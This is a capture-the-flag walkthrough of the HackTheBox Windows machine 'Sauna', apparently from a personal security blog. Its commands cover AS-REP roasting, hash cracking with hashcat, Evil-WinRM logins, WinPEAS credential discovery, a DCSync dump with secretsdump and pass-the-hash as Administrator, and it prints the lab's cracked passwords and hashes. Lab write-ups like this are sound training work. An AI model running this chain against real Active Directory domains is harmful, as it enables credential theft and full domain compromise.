Security Vault

Sauna

Mar 25, 20255 min read

Metadata

  • Platform: HackTheBox
  • CTF: Sauna
  • OS: Windows
  • Difficulty: Easy

Summary

At first, this target does not allow us to interact with it in any meaningful way. However, on the website there is a list of people working at the advertised company. By listing these people and creating possible username permutations, we can find an existing account and perform an AS-REP roast. After cracking this hash, we get a foothold into the system.

Since the target machine stores clear text credentials of another user account, we can pivot to it. After further enumeration, it becomes clear that this account is able to perform a DCSync attack. Through this attack, we obtain the Administrator’s NTLM hash, we get administrative access to the domain controller.

Solution

Reconnaissance

By using nmap against the target, it becomes obvious that we are dealing with a machine part of an AD environment.

nmap -sC -sV 10.10.10.175 -oN nmap.txt -Pn                                                
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 21:43 CET
Nmap scan report for 10.10.10.175
Host is up (0.048s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-18 22:05:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 1h21m27s
| smb2-time: 
|   date: 2025-03-18T22:05:06
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Sadly, the smb share does not allow for access with a NULL session. We therefore can’t interact with the domain, such as to enumerate users. Instead, we can take a look at the website. On it, there is a Meet The Team section with a total of 6 people, who supposedly work at this company.

It’s not a long shot to think that these people might be domain users. Even though we can’t query the domain, we can still verify, if a given username exists on the target. If we are lucky, a discovered account could even be AS-REP roastable. While it is likely that a user account might follow the convention firstname.lastname we can know for sure. After testing for this convention, we actually don’t get a single hit, which either means that these users don’t exist, or that the convention was wrong. Since we are not limited by any means, let’s generate a number of possible name permutations with a script such as UsernameAnarchy. After saving the team’s names to a file, we can generate the permutations.

./username-anarchy -i ../accounts.txt > ../accounts-permutations.txt

User Flag

Now that we have this list of possible username, let’s try to perform a AS-REP roast for each one using GetNPUsers.

GetNPUsers.py -dc-ip 10.10.10.175 -usersfile accounts-permutations.txt EGOTISTICAL-BANK.LOCAL/
 
<cut>
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0bdd5f723d46b7b968d4ddd44fffd508$ca5301bf8df60f91610071f8383e061cc670c4e074f1f7ebe5e3505c07515c86d4108b2167bce8e0f9fcb303956175d95074dad81612a406cedbbedb7736943c6df5e040785dfd83a9f9e85bbcecc7454d98a26d6cbd168afc9cf1a18eb84bff02f5607e60c2fc8cea6ce3fd9332a86c0c6a556a4f023d1e96b2efe7b5ad1f6e4c15c1c234031f6fa3c7eed806bdfe7ea12804330d672bee051c608d30dea6ccd7464d4da2f247de6a790966ccd331d0312e3f5a33613512115fe67af5ca9ad1489042beaf39ce2963e1feb0c8b1df5536031d3c864fc7489bfe921b0a1f280016d059bd60b0cc4afa20e12a39fa549b502e2908fed0d945899b3395c35e87ae
<cut>

We get a result for the fsmith username and its Kerberos hash at the same time. Hashcat might be able to crack it.

hashcat hash -m 18200 /usr/share/wordlists/rockyou.txt
 
<cut>
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0bdd5f723d46b7b968d4ddd44fffd508$ca5301bf8df60f91610071f8383e061cc670c4e074f1f7ebe5e3505c07515c86d4108b2167bce8e0f9fcb303956175d95074dad81612a406cedbbedb7736943c6df5e040785dfd83a9f9e85bbcecc7454d98a26d6cbd168afc9cf1a18eb84bff02f5607e60c2fc8cea6ce3fd9332a86c0c6a556a4f023d1e96b2efe7b5ad1f6e4c15c1c234031f6fa3c7eed806bdfe7ea12804330d672bee051c608d30dea6ccd7464d4da2f247de6a790966ccd331d0312e3f5a33613512115fe67af5ca9ad1489042beaf39ce2963e1feb0c8b1df5536031d3c864fc7489bfe921b0a1f280016d059bd60b0cc4afa20e12a39fa549b502e2908fed0d945899b3395c35e87ae:Thestrokes23
<cut>

The results of this command is the discovery of the following pair of credentials: fsmith:Thestrokes23. With Evil-WinRM, we can get a shell on the target system and claim the user flag.

evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23' 
75a8f4c3a90fb9c4ebd4df1ca4c6c085

Root Flag

Due to our access as a domain user, we can employ Bloodhound-python to gather information about this domain.

bloodhound-python -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c all -u fsmith -p 'Thestrokes23'

Once we load this information into Bloodhound, it does not show us any meaningful privilege escalation techniques for the compromised account fsmith. In fact, the only unusual permissions for low privileges accounts are those of the svc_loanmgr account, which has DCSync access over the domain. However, at this point in time we don’t have access to said account.

For more non-domain related enumeration of the target, it’s a good idea to run WinPEAS, by uploading it to the machine. To our luck, it finds something valuable.

=========|| Additonal Winlogon Credentials Check
EGOTISTICALBANK
EGOTISTICALBANK\svc_loanmanager
Moneymakestheworldgoround!

This is almost the account we found in our Bloodhound graph. While the name slightly differs, it is likely that these accounts at least relate to each other. In addition, the string beneath the username looks like a password. While we can’t log into the svc_loanmanager, we can use this password with Evil-WinRM to obtain a PowerShell session as svc_loanmgr. Now, we can finally perform the DCSync attack using Secretsdump.

secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
<cut>
[*] Cleaning up...

The command’s result contains NTLM hashes of every single account on the domain, including the Administrator’s. By inputting it once again in Evil-WinRM, we get access to the target as this user and can claim the root flag.

evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
38e71fdd330650d89d56af84fb602091

Graph View

Backlinks